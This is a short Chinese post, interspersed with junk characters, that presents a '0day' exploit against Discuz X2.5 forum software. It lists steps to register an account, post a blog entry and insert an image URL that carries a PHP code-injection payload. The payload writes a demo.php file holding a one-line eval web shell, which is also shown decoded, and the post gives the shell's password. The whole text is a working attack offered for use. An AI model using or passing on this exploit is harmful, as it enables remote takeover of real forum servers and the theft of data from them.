DZ X2.5最新0day( T0 O7 X& f1 l8 L: S4 }4 N
1.注册任意账户* m+ P! c2 G5 l
2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了
- t% v- ^( P, T4 o! A5 ^8 _4 [6 C! |9 u( B3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码- r5 `) t6 K/ B" R
<?php @eval($_POST[c]); ?>ok
6 i6 f1 U2 D, y$ i' V7 p: _! n<?fputs(fopen("dome","w"),"<?eval(\$_POST[c]);?>")?>
- w6 M/ D' d/ _3 c3 E7 {6 a! W; W4.访问日志,论坛根目录下生成demo.php,一句发密码C |